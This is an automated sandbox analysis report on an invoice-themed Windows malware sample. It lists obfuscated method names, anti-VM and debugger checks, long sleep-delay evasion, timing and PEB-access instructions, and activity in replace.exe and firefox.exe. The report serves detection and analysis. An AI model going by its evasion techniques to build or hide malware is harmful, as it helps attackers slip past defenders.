            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xQiJO5us6DiOO5sIgg.csHigh entropy of concatenated method names: 'CBWPICLH6I', 'hohPd6mLrs', 'Ve7PUqRpmp', 'GFxP9rjxHv', 'C39PurJKRB', 'XOmPS9iP7V', 'EoQPtO7KEM', 'flUP29XcoD', 'z8dPVUUxmo', 'wCmPwadd2p'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, xUidB8gG139RXqKEpj.csHigh entropy of concatenated method names: 'nP91FMULCd', 'hXe1ganbll', 'joB1iFyQ48', 'qW81BSvmHm', 'v3M1lbNbJV', 'EYl1ajYbtT', 'AZV1QLxyAR', 'u451y4atsp', 'L5c1bqk7UF', 'qCj1Z2cm0T'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, lHvGJbLRUxqHjuNVyP.csHigh entropy of concatenated method names: 'KPvGcOwocc', 'UkhG1FosAE', 'sC4GNaSsor', 'N07GggkS7r', 'mTCGiMcSUv', 'fB1GlyHZZr', 'JlwGaMYLu9', 'C2qkmflqwK', 'CWLkWysaco', 'u06kKfIgye'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, f7t0WrYoXNeVinHJdg.csHigh entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'JOMvKNp2sc', 'cavvfeoqTk', 'EWdvzNoVFn', 'EAL1jCRB81', 'TXi1cyFSq9', 'VMx1vJnGv4', 'PHM11ZFWMG', 'OdgxRTooZlirAR9l28R'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, sir47mZZTPCbePi31b.csHigh entropy of concatenated method names: 'dJhnifyZu', 'oQAAKCtMs', 'sjGo4kmxs', 'oxB0VtDBg', 'PiwdG5YS0', 'vrWhpIbPL', 'ImWamjyMYSvQMXsNA0', 'VR3LZoql8cuP3jE7gd', 'TQ4kaTPp2', 'OCSOpquOR'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, VBBrj4q7OxhL1AOEAN.csHigh entropy of concatenated method names: 'VxNkUOmPIk', 'YFlk9TU5pc', 'wh8kXOLpp0', 'tb5kuo5n2E', 'yFnkpSFTKf', 'ANjkSZAygL', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, uRaCHDMK1mN0X9ZlUAA.csHigh entropy of concatenated method names: 'HHjGJUJKJ1', 'pRiGCSHa9L', 'JccGnv8yqc', 'ylRGAnpVKI', 'QrfGsdColU', 'K6tGoKlycv', 'm85G0fxx2b', 'HhWGIrQeol', 'GPPGdHQ94d', 'FBrGhK2osf'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, yVybD364GKpxs3MmaR.csHigh entropy of concatenated method names: 'xDoBAULC4f', 'B9wBoPEJsg', 'qEpBIns40A', 'uG2BdgAnAs', 'vDbBDMUc7o', 'y2BB6kW6lD', 'kLtB53BhgQ', 'BDiBkSpYsl', 'hnRBGPJqWB', 'NkQBOLiHwi'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, VUpQ3JzfQcgbpyyG6Y.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'ycEGPbXX7P', 'GI5GDs0ErO', 'LtLG6mDRMW', 'T5KG54tnex', 'dgXGkI11Vi', 'QSEGGCtg3X', 'ljAGOeo4ed'
            Source: 0.2.HYCO_Invoices MS2 & MS3.exe.466f830.11.raw.unpack, NVc1yVXpcuL61Ykq2a.csHigh entropy of concatenated method names: 'TWZQg4eptG', 'RfDQBiIkAM', 'DNUQaTCOrP', 'UwwafuExVM', 'pcRazrlyF9', 'ycpQjxsw51', 'BboQcuabnt', 'KADQvG1uqq', 'jJyQ13sXME', 'rCmQNZDGdb'
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: HYCO_Invoices MS2 & MS3.exe PID: 1020, type: MEMORYSTR
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeMemory allocated: 1900000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeMemory allocated: 32F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeMemory allocated: 52F0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeMemory allocated: 66E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeMemory allocated: 76E0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeMemory allocated: 7920000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeMemory allocated: 8920000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0103096E rdtsc 2_2_0103096E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exeWindow / User API: threadDelayed 9782Jump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeAPI coverage: 0.8 %
            Source: C:\Windows\SysWOW64\replace.exeAPI coverage: 3.0 %
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exe TID: 6096Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 6524Thread sleep count: 191 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 6524Thread sleep time: -382000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 6524Thread sleep count: 9782 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\replace.exe TID: 6524Thread sleep time: -19564000s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\replace.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\replace.exeCode function: 5_2_00E1BC00 FindFirstFileW,FindNextFileW,FindClose,5_2_00E1BC00
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: JlRhrxMCYjuGzWWvXkXNzhLX.exe, 00000008.00000002.2890083176.000000000055F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllq
            Source: replace.exe, 00000005.00000002.2889773857.0000000003080000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000009.00000002.2210324690.000001DAA7C3B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\replace.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0103096E rdtsc 2_2_0103096E
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00417673 LdrLoadDll,2_2_00417673
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEC0F0 mov eax, dword ptr fs:[00000030h]2_2_00FEC0F0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0109A118 mov ecx, dword ptr fs:[00000030h]2_2_0109A118
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0109A118 mov eax, dword ptr fs:[00000030h]2_2_0109A118
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0109A118 mov eax, dword ptr fs:[00000030h]2_2_0109A118
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0109A118 mov eax, dword ptr fs:[00000030h]2_2_0109A118
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF80E9 mov eax, dword ptr fs:[00000030h]2_2_00FF80E9
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEA0E3 mov ecx, dword ptr fs:[00000030h]2_2_00FEA0E3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B0115 mov eax, dword ptr fs:[00000030h]2_2_010B0115
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01020124 mov eax, dword ptr fs:[00000030h]2_2_01020124
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01084144 mov eax, dword ptr fs:[00000030h]2_2_01084144
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01084144 mov eax, dword ptr fs:[00000030h]2_2_01084144
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01084144 mov ecx, dword ptr fs:[00000030h]2_2_01084144
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01084144 mov eax, dword ptr fs:[00000030h]2_2_01084144
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01084144 mov eax, dword ptr fs:[00000030h]2_2_01084144
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01088158 mov eax, dword ptr fs:[00000030h]2_2_01088158
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF208A mov eax, dword ptr fs:[00000030h]2_2_00FF208A
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010AC188 mov eax, dword ptr fs:[00000030h]2_2_010AC188
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010AC188 mov eax, dword ptr fs:[00000030h]2_2_010AC188
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01030185 mov eax, dword ptr fs:[00000030h]2_2_01030185
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01094180 mov eax, dword ptr fs:[00000030h]2_2_01094180
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01094180 mov eax, dword ptr fs:[00000030h]2_2_01094180
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107019F mov eax, dword ptr fs:[00000030h]2_2_0107019F
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107019F mov eax, dword ptr fs:[00000030h]2_2_0107019F
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107019F mov eax, dword ptr fs:[00000030h]2_2_0107019F
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107019F mov eax, dword ptr fs:[00000030h]2_2_0107019F
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF2050 mov eax, dword ptr fs:[00000030h]2_2_00FF2050
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B61C3 mov eax, dword ptr fs:[00000030h]2_2_010B61C3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B61C3 mov eax, dword ptr fs:[00000030h]2_2_010B61C3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E1D0 mov eax, dword ptr fs:[00000030h]2_2_0106E1D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E1D0 mov eax, dword ptr fs:[00000030h]2_2_0106E1D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E1D0 mov ecx, dword ptr fs:[00000030h]2_2_0106E1D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E1D0 mov eax, dword ptr fs:[00000030h]2_2_0106E1D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0106E1D0 mov eax, dword ptr fs:[00000030h]2_2_0106E1D0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEA020 mov eax, dword ptr fs:[00000030h]2_2_00FEA020
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEC020 mov eax, dword ptr fs:[00000030h]2_2_00FEC020
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010C61E5 mov eax, dword ptr fs:[00000030h]2_2_010C61E5
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010201F8 mov eax, dword ptr fs:[00000030h]2_2_010201F8
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01074000 mov ecx, dword ptr fs:[00000030h]2_2_01074000
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01092000 mov eax, dword ptr fs:[00000030h]2_2_01092000
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01092000 mov eax, dword ptr fs:[00000030h]2_2_01092000
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01092000 mov eax, dword ptr fs:[00000030h]2_2_01092000
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01092000 mov eax, dword ptr fs:[00000030h]2_2_01092000
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01092000 mov eax, dword ptr fs:[00000030h]2_2_01092000
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01092000 mov eax, dword ptr fs:[00000030h]2_2_01092000
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01092000 mov eax, dword ptr fs:[00000030h]2_2_01092000
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01092000 mov eax, dword ptr fs:[00000030h]2_2_01092000
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100E016 mov eax, dword ptr fs:[00000030h]2_2_0100E016
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100E016 mov eax, dword ptr fs:[00000030h]2_2_0100E016
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100E016 mov eax, dword ptr fs:[00000030h]2_2_0100E016
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0100E016 mov eax, dword ptr fs:[00000030h]2_2_0100E016
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01086030 mov eax, dword ptr fs:[00000030h]2_2_01086030
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01076050 mov eax, dword ptr fs:[00000030h]2_2_01076050
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEA197 mov eax, dword ptr fs:[00000030h]2_2_00FEA197
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEA197 mov eax, dword ptr fs:[00000030h]2_2_00FEA197
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEA197 mov eax, dword ptr fs:[00000030h]2_2_00FEA197
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101C073 mov eax, dword ptr fs:[00000030h]2_2_0101C073
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010880A8 mov eax, dword ptr fs:[00000030h]2_2_010880A8
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FEC156 mov eax, dword ptr fs:[00000030h]2_2_00FEC156
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF6154 mov eax, dword ptr fs:[00000030h]2_2_00FF6154
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF6154 mov eax, dword ptr fs:[00000030h]2_2_00FF6154
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B60B8 mov eax, dword ptr fs:[00000030h]2_2_010B60B8
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010B60B8 mov ecx, dword ptr fs:[00000030h]2_2_010B60B8
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010720DE mov eax, dword ptr fs:[00000030h]2_2_010720DE
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010760E0 mov eax, dword ptr fs:[00000030h]2_2_010760E0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010320F0 mov ecx, dword ptr fs:[00000030h]2_2_010320F0
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A30B mov eax, dword ptr fs:[00000030h]2_2_0102A30B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A30B mov eax, dword ptr fs:[00000030h]2_2_0102A30B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0102A30B mov eax, dword ptr fs:[00000030h]2_2_0102A30B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01010310 mov ecx, dword ptr fs:[00000030h]2_2_01010310
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA2C3 mov eax, dword ptr fs:[00000030h]2_2_00FFA2C3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA2C3 mov eax, dword ptr fs:[00000030h]2_2_00FFA2C3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA2C3 mov eax, dword ptr fs:[00000030h]2_2_00FFA2C3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA2C3 mov eax, dword ptr fs:[00000030h]2_2_00FFA2C3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FFA2C3 mov eax, dword ptr fs:[00000030h]2_2_00FFA2C3
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01072349 mov eax, dword ptr fs:[00000030h]2_2_01072349
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_010BA352 mov eax, dword ptr fs:[00000030h]2_2_010BA352
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_01098350 mov ecx, dword ptr fs:[00000030h]2_2_01098350
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107035C mov eax, dword ptr fs:[00000030h]2_2_0107035C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107035C mov eax, dword ptr fs:[00000030h]2_2_0107035C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107035C mov eax, dword ptr fs:[00000030h]2_2_0107035C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107035C mov ecx, dword ptr fs:[00000030h]2_2_0107035C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107035C mov eax, dword ptr fs:[00000030h]2_2_0107035C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0107035C mov eax, dword ptr fs:[00000030h]2_2_0107035C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0109437C mov eax, dword ptr fs:[00000030h]2_2_0109437C
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101438F mov eax, dword ptr fs:[00000030h]2_2_0101438F
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_0101438F mov eax, dword ptr fs:[00000030h]2_2_0101438F
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FE826B mov eax, dword ptr fs:[00000030h]2_2_00FE826B
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF4260 mov eax, dword ptr fs:[00000030h]2_2_00FF4260
            Source: C:\Users\user\Desktop\HYCO_Invoices MS2 & MS3.exeCode function: 2_2_00FF4260 mov eax, dword ptr fs:[00000030h]2_2_00FF4260
